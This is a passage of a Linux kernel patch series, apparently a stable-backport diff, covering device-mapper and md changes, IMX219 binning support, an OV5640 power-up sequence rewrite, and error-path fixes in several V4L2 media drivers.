+ void dm_put_table_device(struct mapped_device *md, struct dm_dev *d);
+ 
+ int dm_kobject_uevent(struct mapped_device *md, enum kobject_action action,
+-		      unsigned cookie);
++		      unsigned cookie, bool need_resize_uevent);
+ 
+ void dm_internal_suspend(struct mapped_device *md);
+ void dm_internal_resume(struct mapped_device *md);
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 02b0240e7c715..272cc5d14906f 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -9030,7 +9030,7 @@ void md_do_sync(struct md_thread *thread)
+ 	mddev->pers->sync_request(mddev, max_sectors, &skipped);
+ 
+ 	if (!test_bit(MD_RECOVERY_CHECK, &mddev->recovery) &&
+-	    mddev->curr_resync >= MD_RESYNC_ACTIVE) {
++	    mddev->curr_resync > MD_RESYNC_ACTIVE) {
+ 		if (test_bit(MD_RECOVERY_SYNC, &mddev->recovery)) {
+ 			if (test_bit(MD_RECOVERY_INTR, &mddev->recovery)) {
+ 				if (mddev->curr_resync >= mddev->recovery_cp) {
+diff --git a/drivers/media/i2c/imx219.c b/drivers/media/i2c/imx219.c
+index 77bd79a5954ed..7a14688f8c228 100644
+--- a/drivers/media/i2c/imx219.c
++++ b/drivers/media/i2c/imx219.c
+@@ -89,6 +89,12 @@
+ 
+ #define IMX219_REG_ORIENTATION		0x0172
+ 
++/* Binning  Mode */
++#define IMX219_REG_BINNING_MODE		0x0174
++#define IMX219_BINNING_NONE		0x0000
++#define IMX219_BINNING_2X2		0x0101
++#define IMX219_BINNING_2X2_ANALOG	0x0303
++
+ /* Test Pattern Control */
+ #define IMX219_REG_TEST_PATTERN		0x0600
+ #define IMX219_TEST_PATTERN_DISABLE	0
+@@ -143,25 +149,66 @@ struct imx219_mode {
+ 
+ 	/* Default register values */
+ 	struct imx219_reg_list reg_list;
++
++	/* 2x2 binning is used */
++	bool binning;
+ };
+ 
+-/*
+- * Register sets lifted off the i2C interface from the Raspberry Pi firmware
+- * driver.
+- * 3280x2464 = mode 2, 1920x1080 = mode 1, 1640x1232 = mode 4, 640x480 = mode 7.
+- */
+-static const struct imx219_reg mode_3280x2464_regs[] = {
+-	{0x0100, 0x00},
++static const struct imx219_reg imx219_common_regs[] = {
++	{0x0100, 0x00},	/* Mode Select */
++
++	/* To Access Addresses 3000-5fff, send the following commands */
+ 	{0x30eb, 0x0c},
+ 	{0x30eb, 0x05},
+ 	{0x300a, 0xff},
+ 	{0x300b, 0xff},
+ 	{0x30eb, 0x05},
+ 	{0x30eb, 0x09},
+-	{0x0114, 0x01},
+-	{0x0128, 0x00},
+-	{0x012a, 0x18},
++
++	/* PLL Clock Table */
++	{0x0301, 0x05},	/* VTPXCK_DIV */
++	{0x0303, 0x01},	/* VTSYSCK_DIV */
++	{0x0304, 0x03},	/* PREPLLCK_VT_DIV 0x03 = AUTO set */
++	{0x0305, 0x03}, /* PREPLLCK_OP_DIV 0x03 = AUTO set */
++	{0x0306, 0x00},	/* PLL_VT_MPY */
++	{0x0307, 0x39},
++	{0x030b, 0x01},	/* OP_SYS_CLK_DIV */
++	{0x030c, 0x00},	/* PLL_OP_MPY */
++	{0x030d, 0x72},
++
++	/* Undocumented registers */
++	{0x455e, 0x00},
++	{0x471e, 0x4b},
++	{0x4767, 0x0f},
++	{0x4750, 0x14},
++	{0x4540, 0x00},
++	{0x47b4, 0x14},
++	{0x4713, 0x30},
++	{0x478b, 0x10},
++	{0x478f, 0x10},
++	{0x4793, 0x10},
++	{0x4797, 0x0e},
++	{0x479b, 0x0e},
++
++	/* Frame Bank Register Group "A" */
++	{0x0162, 0x0d},	/* Line_Length_A */
++	{0x0163, 0x78},
++	{0x0170, 0x01}, /* X_ODD_INC_A */
++	{0x0171, 0x01}, /* Y_ODD_INC_A */
++
++	/* Output setup registers */
++	{0x0114, 0x01},	/* CSI 2-Lane Mode */
++	{0x0128, 0x00},	/* DPHY Auto Mode */
++	{0x012a, 0x18},	/* EXCK_Freq */
+ 	{0x012b, 0x00},
++};
++
++/*
++ * Register sets lifted off the i2C interface from the Raspberry Pi firmware
++ * driver.
++ * 3280x2464 = mode 2, 1920x1080 = mode 1, 1640x1232 = mode 4, 640x480 = mode 7.
++ */
++static const struct imx219_reg mode_3280x2464_regs[] = {
+ 	{0x0164, 0x00},
+ 	{0x0165, 0x00},
+ 	{0x0166, 0x0c},
+@@ -174,53 +221,13 @@ static const struct imx219_reg mode_3280x2464_regs[] = {
+ 	{0x016d, 0xd0},
+ 	{0x016e, 0x09},
+ 	{0x016f, 0xa0},
+-	{0x0170, 0x01},
+-	{0x0171, 0x01},
+-	{0x0174, 0x00},
+-	{0x0175, 0x00},
+-	{0x0301, 0x05},
+-	{0x0303, 0x01},
+-	{0x0304, 0x03},
+-	{0x0305, 0x03},
+-	{0x0306, 0x00},
+-	{0x0307, 0x39},
+-	{0x030b, 0x01},
+-	{0x030c, 0x00},
+-	{0x030d, 0x72},
+ 	{0x0624, 0x0c},
+ 	{0x0625, 0xd0},
+ 	{0x0626, 0x09},
+ 	{0x0627, 0xa0},
+-	{0x455e, 0x00},
+-	{0x471e, 0x4b},
+-	{0x4767, 0x0f},
+-	{0x4750, 0x14},
+-	{0x4540, 0x00},
+-	{0x47b4, 0x14},
+-	{0x4713, 0x30},
+-	{0x478b, 0x10},
+-	{0x478f, 0x10},
+-	{0x4793, 0x10},
+-	{0x4797, 0x0e},
+-	{0x479b, 0x0e},
+-	{0x0162, 0x0d},
+-	{0x0163, 0x78},
+ };
+ 
+ static const struct imx219_reg mode_1920_1080_regs[] = {
+-	{0x0100, 0x00},
+-	{0x30eb, 0x05},
+-	{0x30eb, 0x0c},
+-	{0x300a, 0xff},
+-	{0x300b, 0xff},
+-	{0x30eb, 0x05},
+-	{0x30eb, 0x09},
+-	{0x0114, 0x01},
+-	{0x0128, 0x00},
+-	{0x012a, 0x18},
+-	{0x012b, 0x00},
+-	{0x0162, 0x0d},
+-	{0x0163, 0x78},
+ 	{0x0164, 0x02},
+ 	{0x0165, 0xa8},
+ 	{0x0166, 0x0a},
+@@ -233,49 +240,13 @@ static const struct imx219_reg mode_1920_1080_regs[] = {
+ 	{0x016d, 0x80},
+ 	{0x016e, 0x04},
+ 	{0x016f, 0x38},
+-	{0x0170, 0x01},
+-	{0x0171, 0x01},
+-	{0x0174, 0x00},
+-	{0x0175, 0x00},
+-	{0x0301, 0x05},
+-	{0x0303, 0x01},
+-	{0x0304, 0x03},
+-	{0x0305, 0x03},
+-	{0x0306, 0x00},
+-	{0x0307, 0x39},
+-	{0x030b, 0x01},
+-	{0x030c, 0x00},
+-	{0x030d, 0x72},
+ 	{0x0624, 0x07},
+ 	{0x0625, 0x80},
+ 	{0x0626, 0x04},
+ 	{0x0627, 0x38},
+-	{0x455e, 0x00},
+-	{0x471e, 0x4b},
+-	{0x4767, 0x0f},
+-	{0x4750, 0x14},
+-	{0x4540, 0x00},
+-	{0x47b4, 0x14},
+-	{0x4713, 0x30},
+-	{0x478b, 0x10},
+-	{0x478f, 0x10},
+-	{0x4793, 0x10},
+-	{0x4797, 0x0e},
+-	{0x479b, 0x0e},
+ };
+ 
+ static const struct imx219_reg mode_1640_1232_regs[] = {
+-	{0x0100, 0x00},
+-	{0x30eb, 0x0c},
+-	{0x30eb, 0x05},
+-	{0x300a, 0xff},
+-	{0x300b, 0xff},
+-	{0x30eb, 0x05},
+-	{0x30eb, 0x09},
+-	{0x0114, 0x01},
+-	{0x0128, 0x00},
+-	{0x012a, 0x18},
+-	{0x012b, 0x00},
+ 	{0x0164, 0x00},
+ 	{0x0165, 0x00},
+ 	{0x0166, 0x0c},
+@@ -288,53 +259,13 @@ static const struct imx219_reg mode_1640_1232_regs[] = {
+ 	{0x016d, 0x68},
+ 	{0x016e, 0x04},
+ 	{0x016f, 0xd0},
+-	{0x0170, 0x01},
+-	{0x0171, 0x01},
+-	{0x0174, 0x01},
+-	{0x0175, 0x01},
+-	{0x0301, 0x05},
+-	{0x0303, 0x01},
+-	{0x0304, 0x03},
+-	{0x0305, 0x03},
+-	{0x0306, 0x00},
+-	{0x0307, 0x39},
+-	{0x030b, 0x01},
+-	{0x030c, 0x00},
+-	{0x030d, 0x72},
+ 	{0x0624, 0x06},
+ 	{0x0625, 0x68},
+ 	{0x0626, 0x04},
+ 	{0x0627, 0xd0},
+-	{0x455e, 0x00},
+-	{0x471e, 0x4b},
+-	{0x4767, 0x0f},
+-	{0x4750, 0x14},
+-	{0x4540, 0x00},
+-	{0x47b4, 0x14},
+-	{0x4713, 0x30},
+-	{0x478b, 0x10},
+-	{0x478f, 0x10},
+-	{0x4793, 0x10},
+-	{0x4797, 0x0e},
+-	{0x479b, 0x0e},
+-	{0x0162, 0x0d},
+-	{0x0163, 0x78},
+ };
+ 
+ static const struct imx219_reg mode_640_480_regs[] = {
+-	{0x0100, 0x00},
+-	{0x30eb, 0x05},
+-	{0x30eb, 0x0c},
+-	{0x300a, 0xff},
+-	{0x300b, 0xff},
+-	{0x30eb, 0x05},
+-	{0x30eb, 0x09},
+-	{0x0114, 0x01},
+-	{0x0128, 0x00},
+-	{0x012a, 0x18},
+-	{0x012b, 0x00},
+-	{0x0162, 0x0d},
+-	{0x0163, 0x78},
+ 	{0x0164, 0x03},
+ 	{0x0165, 0xe8},
+ 	{0x0166, 0x08},
+@@ -347,35 +278,10 @@ static const struct imx219_reg mode_640_480_regs[] = {
+ 	{0x016d, 0x80},
+ 	{0x016e, 0x01},
+ 	{0x016f, 0xe0},
+-	{0x0170, 0x01},
+-	{0x0171, 0x01},
+-	{0x0174, 0x03},
+-	{0x0175, 0x03},
+-	{0x0301, 0x05},
+-	{0x0303, 0x01},
+-	{0x0304, 0x03},
+-	{0x0305, 0x03},
+-	{0x0306, 0x00},
+-	{0x0307, 0x39},
+-	{0x030b, 0x01},
+-	{0x030c, 0x00},
+-	{0x030d, 0x72},
+ 	{0x0624, 0x06},
+ 	{0x0625, 0x68},
+ 	{0x0626, 0x04},
+ 	{0x0627, 0xd0},
+-	{0x455e, 0x00},
+-	{0x471e, 0x4b},
+-	{0x4767, 0x0f},
+-	{0x4750, 0x14},
+-	{0x4540, 0x00},
+-	{0x47b4, 0x14},
+-	{0x4713, 0x30},
+-	{0x478b, 0x10},
+-	{0x478f, 0x10},
+-	{0x4793, 0x10},
+-	{0x4797, 0x0e},
+-	{0x479b, 0x0e},
+ };
+ 
+ static const struct imx219_reg raw8_framefmt_regs[] = {
+@@ -485,6 +391,7 @@ static const struct imx219_mode supported_modes[] = {
+ 			.num_of_regs = ARRAY_SIZE(mode_3280x2464_regs),
+ 			.regs = mode_3280x2464_regs,
+ 		},
++		.binning = false,
+ 	},
+ 	{
+ 		/* 1080P 30fps cropped */
+@@ -501,6 +408,7 @@ static const struct imx219_mode supported_modes[] = {
+ 			.num_of_regs = ARRAY_SIZE(mode_1920_1080_regs),
+ 			.regs = mode_1920_1080_regs,
+ 		},
++		.binning = false,
+ 	},
+ 	{
+ 		/* 2x2 binned 30fps mode */
+@@ -517,6 +425,7 @@ static const struct imx219_mode supported_modes[] = {
+ 			.num_of_regs = ARRAY_SIZE(mode_1640_1232_regs),
+ 			.regs = mode_1640_1232_regs,
+ 		},
++		.binning = true,
+ 	},
+ 	{
+ 		/* 640x480 30fps mode */
+@@ -533,6 +442,7 @@ static const struct imx219_mode supported_modes[] = {
+ 			.num_of_regs = ARRAY_SIZE(mode_640_480_regs),
+ 			.regs = mode_640_480_regs,
+ 		},
++		.binning = true,
+ 	},
+ };
+ 
+@@ -979,6 +889,35 @@ static int imx219_set_framefmt(struct imx219 *imx219)
+ 	return -EINVAL;
+ }
+ 
++static int imx219_set_binning(struct imx219 *imx219)
++{
++	if (!imx219->mode->binning) {
++		return imx219_write_reg(imx219, IMX219_REG_BINNING_MODE,
++					IMX219_REG_VALUE_16BIT,
++					IMX219_BINNING_NONE);
++	}
++
++	switch (imx219->fmt.code) {
++	case MEDIA_BUS_FMT_SRGGB8_1X8:
++	case MEDIA_BUS_FMT_SGRBG8_1X8:
++	case MEDIA_BUS_FMT_SGBRG8_1X8:
++	case MEDIA_BUS_FMT_SBGGR8_1X8:
++		return imx219_write_reg(imx219, IMX219_REG_BINNING_MODE,
++					IMX219_REG_VALUE_16BIT,
++					IMX219_BINNING_2X2_ANALOG);
++
++	case MEDIA_BUS_FMT_SRGGB10_1X10:
++	case MEDIA_BUS_FMT_SGRBG10_1X10:
++	case MEDIA_BUS_FMT_SGBRG10_1X10:
++	case MEDIA_BUS_FMT_SBGGR10_1X10:
++		return imx219_write_reg(imx219, IMX219_REG_BINNING_MODE,
++					IMX219_REG_VALUE_16BIT,
++					IMX219_BINNING_2X2);
++	}
++
++	return -EINVAL;
++}
++
+ static const struct v4l2_rect *
+ __imx219_get_pad_crop(struct imx219 *imx219,
+ 		      struct v4l2_subdev_state *sd_state,
+@@ -1041,6 +980,13 @@ static int imx219_start_streaming(struct imx219 *imx219)
+ 	if (ret < 0)
+ 		return ret;
+ 
++	/* Send all registers that are common to all modes */
++	ret = imx219_write_regs(imx219, imx219_common_regs, ARRAY_SIZE(imx219_common_regs));
++	if (ret) {
++		dev_err(&client->dev, "%s failed to send mfg header\n", __func__);
++		goto err_rpm_put;
++	}
++
+ 	/* Apply default values of current mode */
+ 	reg_list = &imx219->mode->reg_list;
+ 	ret = imx219_write_regs(imx219, reg_list->regs, reg_list->num_of_regs);
+@@ -1056,6 +1002,13 @@ static int imx219_start_streaming(struct imx219 *imx219)
+ 		goto err_rpm_put;
+ 	}
+ 
++	ret = imx219_set_binning(imx219);
++	if (ret) {
++		dev_err(&client->dev, "%s failed to set binning: %d\n",
++			__func__, ret);
++		goto err_rpm_put;
++	}
++
+ 	/* Apply customized values from user */
+ 	ret =  __v4l2_ctrl_handler_setup(imx219->sd.ctrl_handler);
+ 	if (ret)
+diff --git a/drivers/media/i2c/max9286.c b/drivers/media/i2c/max9286.c
+index 9c083cf142319..d034a67042e35 100644
+--- a/drivers/media/i2c/max9286.c
++++ b/drivers/media/i2c/max9286.c
+@@ -932,6 +932,7 @@ static int max9286_v4l2_register(struct max9286_priv *priv)
+ err_put_node:
+ 	fwnode_handle_put(ep);
+ err_async:
++	v4l2_ctrl_handler_free(&priv->ctrls);
+ 	max9286_v4l2_notifier_unregister(priv);
+ 
+ 	return ret;
+diff --git a/drivers/media/i2c/ov2740.c b/drivers/media/i2c/ov2740.c
+index f3731f932a946..89d126240c345 100644
+--- a/drivers/media/i2c/ov2740.c
++++ b/drivers/media/i2c/ov2740.c
+@@ -629,8 +629,10 @@ static int ov2740_init_controls(struct ov2740 *ov2740)
+ 				     V4L2_CID_TEST_PATTERN,
+ 				     ARRAY_SIZE(ov2740_test_pattern_menu) - 1,
+ 				     0, 0, ov2740_test_pattern_menu);
+-	if (ctrl_hdlr->error)
++	if (ctrl_hdlr->error) {
++		v4l2_ctrl_handler_free(ctrl_hdlr);
+ 		return ctrl_hdlr->error;
++	}
+ 
+ 	ov2740->sd.ctrl_handler = ctrl_hdlr;
+ 
+diff --git a/drivers/media/i2c/ov5640.c b/drivers/media/i2c/ov5640.c
+index e0f908af581b8..c159f297ab92a 100644
+--- a/drivers/media/i2c/ov5640.c
++++ b/drivers/media/i2c/ov5640.c
+@@ -50,6 +50,7 @@
+ #define OV5640_REG_SYS_CTRL0		0x3008
+ #define OV5640_REG_SYS_CTRL0_SW_PWDN	0x42
+ #define OV5640_REG_SYS_CTRL0_SW_PWUP	0x02
++#define OV5640_REG_SYS_CTRL0_SW_RST	0x82
+ #define OV5640_REG_CHIP_ID		0x300a
+ #define OV5640_REG_IO_MIPI_CTRL00	0x300e
+ #define OV5640_REG_PAD_OUTPUT_ENABLE01	0x3017
+@@ -532,7 +533,7 @@ static const struct v4l2_mbus_framefmt ov5640_default_fmt = {
+ };
+ 
+ static const struct reg_value ov5640_init_setting[] = {
+-	{0x3103, 0x11, 0, 0}, {0x3008, 0x82, 0, 5}, {0x3008, 0x42, 0, 0},
++	{0x3103, 0x11, 0, 0},
+ 	{0x3103, 0x03, 0, 0}, {0x3630, 0x36, 0, 0},
+ 	{0x3631, 0x0e, 0, 0}, {0x3632, 0xe2, 0, 0}, {0x3633, 0x12, 0, 0},
+ 	{0x3621, 0xe0, 0, 0}, {0x3704, 0xa0, 0, 0}, {0x3703, 0x5a, 0, 0},
+@@ -2424,24 +2425,48 @@ static void ov5640_power(struct ov5640_dev *sensor, bool enable)
+ 	gpiod_set_value_cansleep(sensor->pwdn_gpio, enable ? 0 : 1);
+ }
+ 
+-static void ov5640_reset(struct ov5640_dev *sensor)
++/*
++ * From section 2.7 power up sequence:
++ * t0 + t1 + t2 >= 5ms	Delay from DOVDD stable to PWDN pull down
++ * t3 >= 1ms		Delay from PWDN pull down to RESETB pull up
++ * t4 >= 20ms		Delay from RESETB pull up to SCCB (i2c) stable
++ *
++ * Some modules don't expose RESETB/PWDN pins directly, instead providing a
++ * "PWUP" GPIO which is wired through appropriate delays and inverters to the
++ * pins.
++ *
++ * In such cases, this gpio should be mapped to pwdn_gpio in the driver, and we
++ * should still toggle the pwdn_gpio below with the appropriate delays, while
++ * the calls to reset_gpio will be ignored.
++ */
++static void ov5640_powerup_sequence(struct ov5640_dev *sensor)
+ {
+-	if (!sensor->reset_gpio)
+-		return;
+-
+-	gpiod_set_value_cansleep(sensor->reset_gpio, 0);
++	if (sensor->pwdn_gpio) {
++		gpiod_set_value_cansleep(sensor->reset_gpio, 0);
+ 
+-	/* camera power cycle */
+-	ov5640_power(sensor, false);
+-	usleep_range(5000, 10000);
+-	ov5640_power(sensor, true);
+-	usleep_range(5000, 10000);
++		/* camera power cycle */
++		ov5640_power(sensor, false);
++		usleep_range(5000, 10000);
++		ov5640_power(sensor, true);
++		usleep_range(5000, 10000);
+ 
+-	gpiod_set_value_cansleep(sensor->reset_gpio, 1);
+-	usleep_range(1000, 2000);
++		gpiod_set_value_cansleep(sensor->reset_gpio, 1);
++		usleep_range(1000, 2000);
+ 
+-	gpiod_set_value_cansleep(sensor->reset_gpio, 0);
++		gpiod_set_value_cansleep(sensor->reset_gpio, 0);
++	} else {
++		/* software reset */
++		ov5640_write_reg(sensor, OV5640_REG_SYS_CTRL0,
++				 OV5640_REG_SYS_CTRL0_SW_RST);
++	}
+ 	usleep_range(20000, 25000);
++
++	/*
++	 * software standby: allows registers programming;
++	 * exit at restore_mode() for CSI, s_stream(1) for DVP
++	 */
++	ov5640_write_reg(sensor, OV5640_REG_SYS_CTRL0,
++			 OV5640_REG_SYS_CTRL0_SW_PWDN);
+ }
+ 
+ static int ov5640_set_power_on(struct ov5640_dev *sensor)
+@@ -2464,8 +2489,7 @@ static int ov5640_set_power_on(struct ov5640_dev *sensor)
+ 		goto xclk_off;
+ 	}
+ 
+-	ov5640_reset(sensor);
+-	ov5640_power(sensor, true);
++	ov5640_powerup_sequence(sensor);
+ 
+ 	ret = ov5640_init_slave_id(sensor);
+ 	if (ret)
+diff --git a/drivers/media/i2c/ov5675.c b/drivers/media/i2c/ov5675.c
+index 94dc8cb7a7c00..a6e6b367d1283 100644
+--- a/drivers/media/i2c/ov5675.c
++++ b/drivers/media/i2c/ov5675.c
+@@ -820,8 +820,10 @@ static int ov5675_init_controls(struct ov5675 *ov5675)
+ 	v4l2_ctrl_new_std(ctrl_hdlr, &ov5675_ctrl_ops,
+ 			  V4L2_CID_VFLIP, 0, 1, 1, 0);
+ 
+-	if (ctrl_hdlr->error)
++	if (ctrl_hdlr->error) {
++		v4l2_ctrl_handler_free(ctrl_hdlr);
+ 		return ctrl_hdlr->error;
++	}
+ 
+ 	ov5675->sd.ctrl_handler = ctrl_hdlr;
+ 
+diff --git a/drivers/media/i2c/ov7670.c b/drivers/media/i2c/ov7670.c
+index 11d3bef65d43c..6e423cbcdc462 100644
+--- a/drivers/media/i2c/ov7670.c
++++ b/drivers/media/i2c/ov7670.c
+@@ -1840,7 +1840,7 @@ static int ov7670_parse_dt(struct device *dev,
+ 
+ 	if (bus_cfg.bus_type != V4L2_MBUS_PARALLEL) {
+ 		dev_err(dev, "Unsupported media bus type\n");
+-		return ret;
++		return -EINVAL;
+ 	}
+ 	info->mbus_config = bus_cfg.bus.parallel.flags;
+ 
+diff --git a/drivers/media/i2c/ov772x.c b/drivers/media/i2c/ov772x.c
+index 4189e3fc3d535..a238e63425f8c 100644
+--- a/drivers/media/i2c/ov772x.c
++++ b/drivers/media/i2c/ov772x.c
+@@ -1462,7 +1462,7 @@ static int ov772x_probe(struct i2c_client *client)
+ 	priv->subdev.ctrl_handler = &priv->hdl;
+ 	if (priv->hdl.error) {
+ 		ret = priv->hdl.error;
+-		goto error_mutex_destroy;
++		goto error_ctrl_free;
+ 	}
+ 
+ 	priv->clk = clk_get(&client->dev, NULL);
+@@ -1515,7 +1515,6 @@ error_clk_put:
+ 	clk_put(priv->clk);
+ error_ctrl_free:
+ 	v4l2_ctrl_handler_free(&priv->hdl);
+-error_mutex_destroy:
+ 	mutex_destroy(&priv->lock);
+ 
+ 	return ret;
+diff --git a/drivers/media/i2c/tc358746.c b/drivers/media/i2c/tc358746.c
+index d1f552bd81d42..4063754a67320 100644
+--- a/drivers/media/i2c/tc358746.c
++++ b/drivers/media/i2c/tc358746.c
+@@ -406,7 +406,7 @@ tc358746_apply_pll_config(struct tc358746 *tc358746)
+ 
+ 	val = PLL_FRS(ilog2(post)) | RESETB | PLL_EN;
+ 	mask = PLL_FRS_MASK | RESETB | PLL_EN;
+-	tc358746_update_bits(tc358746, PLLCTL1_REG, mask, val);
++	err = tc358746_update_bits(tc358746, PLLCTL1_REG, mask, val);
+ 	if (err)
+ 		return err;
+ 
+@@ -988,6 +988,8 @@ static int __maybe_unused
+ tc358746_g_register(struct v4l2_subdev *sd, struct v4l2_dbg_register *reg)
+ {
+ 	struct tc358746 *tc358746 = to_tc358746(sd);
++	u32 val;
++	int err;
+ 
+ 	/* 32-bit registers starting from CLW_DPHYCONTTX */
+ 	reg->size = reg->reg < CLW_DPHYCONTTX_REG ? 2 : 4;
+@@ -995,12 +997,13 @@ tc358746_g_register(struct v4l2_subdev *sd, struct v4l2_dbg_register *reg)
+ 	if (!pm_runtime_get_if_in_use(sd->dev))
+ 		return 0;
+ 
+-	tc358746_read(tc358746, reg->reg, (u32 *)&reg->val);
++	err = tc358746_read(tc358746, reg->reg, &val);
++	reg->val = val;
+ 
+ 	pm_runtime_mark_last_busy(sd->dev);
+ 	pm_runtime_put_sync_autosuspend(sd->dev);
+ 
+-	return 0;
++	return err;
+ }
+ 
+ static int __maybe_unused
+diff --git a/drivers/media/mc/mc-entity.c b/drivers/media/mc/mc-entity.c
+index b8bcbc734eaf4..f268cf66053e1 100644
+--- a/drivers/media/mc/mc-entity.c
++++ b/drivers/media/mc/mc-entity.c
+@@ -703,7 +703,7 @@ done:
+ __must_check int __media_pipeline_start(struct media_pad *pad,
+ 					struct media_pipeline *pipe)
+ {
+-	struct media_device *mdev = pad->entity->graph_obj.mdev;
++	struct media_device *mdev = pad->graph_obj.mdev;
+ 	struct media_pipeline_pad *err_ppad;
+ 	struct media_pipeline_pad *ppad;
+ 	int ret;
+@@ -851,7 +851,7 @@ EXPORT_SYMBOL_GPL(__media_pipeline_start);
+ __must_check int media_pipeline_start(struct media_pad *pad,
+ 				      struct media_pipeline *pipe)
+ {
+-	struct media_device *mdev = pad->entity->graph_obj.mdev;
++	struct media_device *mdev = pad->graph_obj.mdev;
+ 	int ret;
+ 
+ 	mutex_lock(&mdev->graph_mutex);
+@@ -888,7 +888,7 @@ EXPORT_SYMBOL_GPL(__media_pipeline_stop);
+ 
+ void media_pipeline_stop(struct media_pad *pad)
+ {
+-	struct media_device *mdev = pad->entity->graph_obj.mdev;
++	struct media_device *mdev = pad->graph_obj.mdev;
+ 
+ 	mutex_lock(&mdev->graph_mutex);
+ 	__media_pipeline_stop(pad);
+@@ -898,7 +898,7 @@ EXPORT_SYMBOL_GPL(media_pipeline_stop);
+ 
+ __must_check int media_pipeline_alloc_start(struct media_pad *pad)
+ {
+-	struct media_device *mdev = pad->entity->graph_obj.mdev;
++	struct media_device *mdev = pad->graph_obj.mdev;
+ 	struct media_pipeline *new_pipe = NULL;
+ 	struct media_pipeline *pipe;
+ 	int ret;
+diff --git a/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c b/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c
+index 390bd5ea34724..3b76a9d0383a8 100644
+--- a/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c
++++ b/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c
+@@ -1843,6 +1843,9 @@ static void cio2_pci_remove(struct pci_dev *pci_dev)
+ 	v4l2_device_unregister(&cio2->v4l2_dev);
+ 	media_device_cleanup(&cio2->media_dev);
+ 	mutex_destroy(&cio2->lock);
++
++	pm_runtime_forbid(&pci_dev->dev);
++	pm_runtime_get_noresume(&pci_dev->dev);
+ }
+ 
+ static int __maybe_unused cio2_runtime_suspend(struct device *dev)
+diff --git a/drivers/media/pci/saa7134/saa7134-core.c b/drivers/media/pci/saa7134/saa7134-core.c
+index 96328b0af1641..cf2871306987c 100644
+--- a/drivers/media/pci/saa7134/saa7134-core.c
++++ b/drivers/media/pci/saa7134/saa7134-core.c
+@@ -978,7 +978,7 @@ static void saa7134_unregister_video(struct saa7134_dev *dev)
+ 	}
+ 	if (dev->radio_dev) {
+ 		if (video_is_registered(dev->radio_dev))
+-			vb2_video_unregister_device(dev->radio_dev);
++			video_unregister_device(dev->radio_dev);
+ 		else
+ 			video_device_release(dev->radio_dev);
+ 		dev->radio_dev = NULL;
+diff --git a/drivers/media/platform/amphion/vpu_color.c b/drivers/media/platform/amphion/vpu_color.c
+index 80b9a53fd1c14..4ae435cbc5cda 100644
+--- a/drivers/media/platform/amphion/vpu_color.c
++++ b/drivers/media/platform/amphion/vpu_color.c
+@@ -17,7 +17,7 @@
+ #include "vpu_helpers.h"
+ 
+ static const u8 colorprimaries[] = {
+-	0,
++	V4L2_COLORSPACE_LAST,
+ 	V4L2_COLORSPACE_REC709,         /*Rec. ITU-R BT.709-6*/
+ 	0,
+ 	0,
+@@ -31,7 +31,7 @@ static const u8 colorprimaries[] = {
+ };
+ 
+ static const u8 colortransfers[] = {
+-	0,
++	V4L2_XFER_FUNC_LAST,
+ 	V4L2_XFER_FUNC_709,             /*Rec. ITU-R BT.709-6*/
+ 	0,
+ 	0,
+@@ -53,7 +53,7 @@ static const u8 colortransfers[] = {
+ };
+ 
+ static const u8 colormatrixcoefs[] = {
+-	0,
++	V4L2_YCBCR_ENC_LAST,
+ 	V4L2_YCBCR_ENC_709,              /*Rec. ITU-R BT.709-6*/
+ 	0,
+ 	0,
+diff --git a/drivers/media/platform/mediatek/mdp3/Kconfig b/drivers/media/platform/mediatek/mdp3/Kconfig
+index 846e759a8f6a9..602329c447501 100644
+--- a/drivers/media/platform/mediatek/mdp3/Kconfig
++++ b/drivers/media/platform/mediatek/mdp3/Kconfig
+@@ -3,14 +3,13 @@ config VIDEO_MEDIATEK_MDP3
+ 	tristate "MediaTek MDP v3 driver"
+ 	depends on MTK_IOMMU || COMPILE_TEST
+ 	depends on VIDEO_DEV
+-	depends on ARCH_MEDIATEK || COMPILE_TEST
+ 	depends on HAS_DMA
+ 	depends on REMOTEPROC
++	depends on MTK_MMSYS
++	depends on MTK_CMDQ
++	depends on MTK_SCP
+ 	select VIDEOBUF2_DMA_CONTIG
+ 	select V4L2_MEM2MEM_DEV
+-	select MTK_MMSYS
+-	select MTK_CMDQ
+-	select MTK_SCP
+ 	default n
+ 	help
+ 	    It is a v4l2 driver and present in MediaTek MT8183 SoC.
+diff --git a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-core.c b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-core.c
+index 2d1f6ae9f0802..97edcd9d1c817 100644
+--- a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-core.c
++++ b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-core.c
+@@ -207,8 +207,8 @@ static int mdp_probe(struct platform_device *pdev)
+ 	}
+ 	for (i = 0; i < MDP_PIPE_MAX; i++) {
+ 		mdp->mdp_mutex[i] = mtk_mutex_get(&mm_pdev->dev);
+-		if (!mdp->mdp_mutex[i]) {
+-			ret = -ENODEV;
++		if (IS_ERR(mdp->mdp_mutex[i])) {
++			ret = PTR_ERR(mdp->mdp_mutex[i]);
+ 			goto err_free_mutex;
+ 		}
+ 	}
+@@ -289,7 +289,8 @@ err_deinit_comp:
+ 	mdp_comp_destroy(mdp);
+ err_free_mutex:
+ 	for (i = 0; i < MDP_PIPE_MAX; i++)
+-		mtk_mutex_put(mdp->mdp_mutex[i]);
++		if (!IS_ERR_OR_NULL(mdp->mdp_mutex[i]))
++			mtk_mutex_put(mdp->mdp_mutex[i]);
+ err_destroy_device:
+ 	kfree(mdp);
+ err_return:
+diff --git a/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.c b/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.c
+index 6cd015a35f7c4..f085f14d676ad 100644
+--- a/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.c
++++ b/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.c
+@@ -2472,19 +2472,12 @@ static int mxc_jpeg_probe(struct platform_device *pdev)
+ 	jpeg->mode = mode;
+ 
+ 	/* Get clocks */
+-	jpeg->clk_ipg = devm_clk_get(dev, "ipg");
+-	if (IS_ERR(jpeg->clk_ipg)) {
+-		dev_err(dev, "failed to get clock: ipg\n");
+-		ret = PTR_ERR(jpeg->clk_ipg);
+-		goto err_clk;
+-	}
+-
+-	jpeg->clk_per = devm_clk_get(dev, "per");
